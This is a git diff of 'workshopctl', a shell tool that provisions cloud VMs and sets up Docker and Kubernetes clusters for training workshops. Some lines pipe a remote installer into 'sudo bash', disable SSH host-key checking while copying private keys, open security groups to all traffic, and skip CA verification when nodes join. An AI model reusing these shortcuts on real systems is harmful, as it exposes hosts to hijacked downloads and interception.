TAG=$(./workshopctl maketag)
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
./workshopctl deploy $TAG
./workshopctl kube $TAG
./workshopctl helmprom $TAG
while ! ./workshopctl kubetest $TAG; do sleep 1; done
./workshopctl tmux $TAG
echo ./workshopctl stop $TAG

View File

@@ -1,6 +0,0 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...

View File

@@ -1,2 +0,0 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.

View File

@@ -1,9 +0,0 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"

105
prepare-vms/lib/aws.sh Normal file
View File

@@ -0,0 +1,105 @@
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
TAG=$1
need_tag $TAG
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
need_tag $TOKEN
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
TAG=$1
need_tag $TAG
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
TAG=$1
need_tag $TAG
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

View File

@@ -2,7 +2,7 @@
_ERR() {
error "Command $BASH_COMMAND failed (exit status: $?)"
}
set -eE
set -e
trap _ERR ERR
die() {
@@ -50,41 +50,27 @@ sep() {
fi
}
need_infra() {
if [ -z "$1" ]; then
die "Please specify infrastructure file. (e.g.: infra/aws)"
fi
if [ "$1" = "--infra" ]; then
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
fi
if [ ! -f "$1" ]; then
die "Infrastructure file $1 doesn't exist."
fi
. "$1"
. "lib/infra/$INFRACLASS.sh"
}
need_tag() {
if [ -z "$TAG" ]; then
if [ -z "$1" ]; then
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
fi
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in settings.yaml ips.txt infra.sh; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi
done
. "tags/$TAG/infra.sh"
. "lib/infra/$INFRACLASS.sh"
}
need_settings() {
if [ -z "$1" ]; then
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
fi
if [ ! -f "$1" ]; then
die "Please specify a settings file."
elif [ ! -f "$1" ]; then
die "Settings file $1 doesn't exist."
fi
}
need_ips_file() {
IPS_FILE=$1
if [ -z "$IPS_FILE" ]; then
die "IPS_FILE not set."
fi
if [ ! -s "$IPS_FILE" ]; then
die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
fi
}

View File

@@ -2,16 +2,26 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
_cmd_help() {
printf "$(basename $0) - the container training swiss army knife\n"
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
printf "Commands:"
printf "%s" "$HELP" | sort
}
_cmd amis "List Ubuntu AMIs in the current region"
_cmd_amis() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
}
_cmd ami "Show the AMI that will be used for deployment"
_cmd_ami() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
}
_cmd build "Build the Docker image to run this program in a container"
_cmd_build() {
docker-compose build
@@ -22,67 +32,70 @@ _cmd_wrap() {
docker-compose run --rm workshopctl "$@"
}
_cmd cards "Generate ready-to-print cards for a group of VMs"
_cmd cards "Generate ready-to-print cards for a batch of VMs"
_cmd_cards() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../lib/ips-txt-to-html.py settings.yaml
)
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
ln -sf ../tags/$TAG/ips.html www/$TAG.html
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
# Remove symlinks to old cards
rm -f ips.html ips.pdf
# This will generate two files in the base dir: ips.pdf and ips.html
python lib/ips-txt-to-html.py $SETTINGS
for f in ips.html ips.pdf; do
# Remove old versions of cards if they exist
rm -f tags/$TAG/$f
# Move the generated file and replace it with a symlink
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
done
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "Or you can start a web server with:"
info "$0 www"
info "xdg-open ips.html ips.pdf (on Linux)"
info "open ips.html ips.pdf (on MacOS)"
}
_cmd deploy "Install Docker on a bunch of running VMs"
_cmd_deploy() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
link_tag $TAG
count=$(wc -l ips.txt)
# wait until all hosts are reachable before trying to deploy
info "Trying to reach $TAG instances..."
while ! tag_is_reachable; do
while ! tag_is_reachable $TAG; do
>/dev/stderr echo -n "."
sleep 2
done
>/dev/stderr echo ""
echo deploying > tags/$TAG/status
sep "Deploying tag $TAG"
# Wait for cloudinit to be done
pssh "
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
sleep 1
done"
# Copy settings and install Python YAML parser
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
pssh -I tee /tmp/settings.yaml <$SETTINGS
pssh "
sudo apt-get update &&
sudo apt-get install -y python-yaml"
sudo apt-get install -y python-setuptools &&
sudo easy_install pyyaml"
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
pssh -I tee /tmp/postprep.py <lib/postprep.py
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
# Install docker-prompt script
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -91,100 +104,46 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
sep "Deployed tag $TAG"
echo deployed > tags/$TAG/status
info "You may want to run one of the following commands:"
info "$0 kube $TAG"
info "$0 pull_images $TAG"
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "
sudo systemctl disable docker.service
sudo systemctl disable docker.socket
sudo systemctl stop docker
sudo killall containerd
"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
##VERSION##
curl -L https://github.com/etcd-io/etcd/releases/download/v3.4.3/etcd-v3.4.3-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
##VERSION##
curl -L https://dl.k8s.io/v1.17.2/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx \
kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.6/cni-plugins-amd64-v0.7.6.tgz \
| sudo tar -zx
fi
"
info "$0 cards $TAG $SETTINGS"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_APTGET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_APTGET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
pssh "
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
sudo apt-key add - &&
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
pssh "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
sudo apt-get install -qy kubelet kubeadm kubectl
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
pssh "
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -194,103 +153,22 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n')
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
fi"
# Install kubectx and kubens
pssh "
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
sudo -u docker tee -a /home/docker/.bashrc <<EOF
. /home/ubuntu/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
KUBE_PS1_CTX_COLOR="green"
KUBE_PS1_NS_COLOR="green"
EOF"
# Install stern
pssh "
if [ ! -x /usr/local/bin/stern ]; then
##VERSION##
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
sudo chmod +x /usr/local/bin/stern &&
stern --completion bash | sudo tee /etc/bash_completion.d/stern
fi"
# Install helm
pssh "
if [ ! -x /usr/local/bin/helm ]; then
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
##VERSION##
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
sep "Done"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
_cmd_kubereset() {
TAG=$1
need_tag
pssh "sudo kubeadm reset --force"
}
_cmd kubetest "Check that all nodes are reporting as Ready"
_cmd_kubetest() {
TAG=$1
need_tag
# There are way too many backslashes in the command below.
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
}
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
_cmd ids "List the instance IDs belonging to a given tag or token"
_cmd_ids() {
TAG=$1
need_tag $TAG
@@ -303,398 +181,247 @@ _cmd_ids() {
aws_get_instance_ids_by_client_token $TAG
}
_cmd list "List available groups for a given infrastructure"
_cmd ips "List the IP addresses of the VMs for a given tag or token"
_cmd_ips() {
TAG=$1
need_tag $TAG
mkdir -p tags/$TAG
aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
link_tag $TAG
}
_cmd list "List available batches in the current region"
_cmd_list() {
need_infra $1
infra_list
info "Listing batches in region $AWS_DEFAULT_REGION:"
aws_display_tags
}
_cmd listall "List VMs running on all configured infrastructures"
_cmd_listall() {
for infra in infra/*; do
case $infra in
infra/example.*)
;;
*)
info "Listing infrastructure $infra:"
need_infra $infra
infra_list
;;
esac
done
}
_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
if [ -z $USER ]; then
export USER=anonymous
fi
MS=$(($(date +%N)/1000000))
date +%Y-%m-%d-%H-%M-$MS-$USER
}
_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
_cmd status "List instance status for a given batch"
_cmd_status() {
info "Using region $AWS_DEFAULT_REGION."
TAG=$1
need_tag
fping < tags/$TAG/ips.txt
}
_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
TAG=$1
need_tag
pssh "
sudo ethtool -K ens3 gro off
sudo tee /root/pinger.service <<EOF
[Unit]
Description=pinger
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/
ExecStart=/bin/ping -w60 1.1
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/pinger.service
sudo systemctl start pinger"
}
_cmd tailhist "Install history viewer on port 1088"
_cmd_tailhist () {
TAG=$1
need_tag
pssh "
wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
sudo dpkg -i websocketd-0.3.0_amd64.deb
sudo mkdir -p /tmp/tailhist
sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/tailhist.service
sudo systemctl start tailhist"
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
need_tag $TAG
describe_tag $TAG
tag_is_reachable $TAG
info "You may be interested in running one of the following commands:"
info "$0 ips $TAG"
info "$0 deploy $TAG <settings/somefile.yaml>"
}
_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
need_infra $1
infra_opensg
}
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
_cmd portworx "Prepare the nodes for Portworx deployment"
_cmd_portworx() {
TAG=$1
need_tag
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
pssh "
sudo truncate --size 10G /portworx.blk &&
sudo losetup /dev/loop4 /portworx.blk"
}
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
need_tag
shift
pssh "$@"
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
_cmd pull_images "Pre-pull a bunch of Docker images"
_cmd_pull_images() {
TAG=$1
need_tag
pull_tag
need_tag $TAG
pull_tag $TAG
}
_cmd remap_nodeports "Remap NodePort range to 10000-10999"
_cmd_remap_nodeports() {
TAG=$1
need_tag
FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
ADD_LINE=" - --service-node-port-range=10000-10999"
MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
pssh "
if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
fi"
}
_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
need_infra $1
infra_quotas
}
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
_cmd retag "Apply a new tag to a batch of VMs"
_cmd_retag() {
OLDTAG=$1
NEWTAG=$2
TAG=$OLDTAG
need_tag
need_tag $OLDTAG
if [[ -z "$NEWTAG" ]]; then
die "You must specify a new tag to apply."
fi
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd start "Start a batch of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
case "$1" in
--infra) INFRA=$2; shift 2;;
--settings) SETTINGS=$2; shift 2;;
--count) COUNT=$2; shift 2;;
--tag) TAG=$2; shift 2;;
*) die "Unrecognized parameter: $1."
esac
done
# Number of instances to create
COUNT=$1
# Optional settings file (to carry on with deployment)
SETTINGS=$2
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
if [ -z "$SETTINGS" ]; then
die "Please add --settings flag to specify which settings file to use."
fi
if [ -z "$COUNT" ]; then
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
die "Indicate number of instances to start."
fi
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
# Print our AWS username, to ease the pain of credential-juggling
greet
if [ -z "$TAG" ]; then
TAG=$(_cmd_maketag)
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(_cmd_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
mkdir -p tags/$TAG
ln -s ../../$INFRA tags/$TAG/infra.sh
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
echo creating > tags/$TAG/status
TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
AWS_KEY_NAME=$(make_key_name)
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TOKEN"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type t2.medium \
--client-token $TOKEN \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
TAG=$TOKEN
aws_tag_instances $TOKEN $TAG
wait_until_tag_is_running $TAG $COUNT
infra_start $COUNT
sep
info "Successfully created $COUNT instances with tag $TAG"
sep
echo created > tags/$TAG/status
info "To deploy Docker on these instances, you can run:"
info "$0 deploy $TAG"
info "To terminate these instances, you can run:"
info "$0 stop $TAG"
mkdir -p tags/$TAG
IPS=$(aws_get_instance_ips_by_tag $TAG)
echo "$IPS" >tags/$TAG/ips.txt
link_tag $TAG
if [ -n "$SETTINGS" ]; then
_cmd_deploy $TAG $SETTINGS
else
info "To deploy or kill these instances, run one of the following:"
info "$0 deploy $TAG <settings/somefile.yaml>"
info "$0 stop $TAG"
fi
}
_cmd ec2quotas "Check our EC2 quotas (max instances)"
_cmd_ec2quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
_cmd_stop() {
TAG=$1
need_tag
infra_stop
echo stopped > tags/$TAG/status
need_tag $TAG
aws_kill_instances_by_tag $TAG
}
_cmd tags "List groups of VMs known locally"
_cmd_tags() {
(
cd tags
echo "[#] [Status] [Tag] [Infra]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
for tag in *; do
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
if [ -f $tag/status ]; then
status="$(cat $tag/status)"
else
status="?"
fi
if [ -f $tag/infra.sh ]; then
infra="$(basename $(readlink $tag/infra.sh))"
else
infra="?"
fi
echo "$count $status $tag $infra" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
done
)
}
_cmd test "Run tests (pre-flight checks) on a group of VMs"
_cmd test "Run tests (pre-flight checks) on a batch of VMs"
_cmd_test() {
TAG=$1
need_tag
test_tag
need_tag $TAG
test_tag $TAG
}
_cmd tmux "Log into the first node and start a tmux server"
_cmd_tmux() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Opening ssh+tmux with $IP"
rm -f /tmp/tmux-$UID/default
ssh -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
}
_cmd helmprom "Install Helm and Prometheus"
_cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
sudo -u docker -H helm repo add stable https://kubernetes-charts.storage.googleapis.com/
sudo -u docker -H helm install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
--set server.persistentVolume.enabled=false \
--set alertmanager.enabled=false
fi"
}
# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
# Remedy: wipe out Weave state and delete weave pod on that node.
# Specifically, identify the weave pod that is defective, then:
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
# kubectl -n kube-system delete pod weave-net-XXXXX
_cmd weavetest "Check that weave seems properly setup"
_cmd_weavetest() {
TAG=$1
need_tag
pssh "
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}
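Once weavetest points at the defective pod, the remedy described in the comment above can be applied by hand; a hedged sketch, where WEAVE_POD is a placeholder for that pod's name:
WEAVE_POD=weave-net-XXXXX
kubectl -n kube-system exec $WEAVE_POD -c weave -- rm /weavedb/weave-netdata.db
kubectl -n kube-system delete pod $WEAVE_POD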
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
_cmd_webssh() {
TAG=$1
need_tag
pssh "
sudo apt-get update &&
sudo apt-get install python-tornado python-paramiko -y"
pssh "
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
pssh "
for KEYFILE in /etc/ssh/*.pub; do
read a b c < \$KEYFILE; echo localhost \$a \$b
done > webssh/known_hosts"
pssh "cat >webssh.service <<EOF
[Unit]
Description=webssh
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/home/ubuntu/webssh
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
EOF"
pssh "
sudo systemctl enable \$PWD/webssh.service &&
sudo systemctl start webssh.service"
}
_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
cd www
IPADDR=$(curl -sL canihazip.com/s)
info "The following files are available:"
for F in *; do
echo "http://$IPADDR:8000/$F"
done
info "Press Ctrl-C to stop server."
python3 -m http.server
}
###
greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}
link_tag() {
TAG=$1
need_tag $TAG
IPS_FILE=tags/$TAG/ips.txt
need_ips_file $IPS_FILE
ln -sf $IPS_FILE ips.txt
}
pull_tag() {
TAG=$1
need_tag $TAG
link_tag $TAG
if [ ! -s $IPS_FILE ]; then
die "Nonexistent or empty IPs file $IPS_FILE."
fi
# Pre-pull a bunch of images
pssh --timeout 900 'for I in \
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
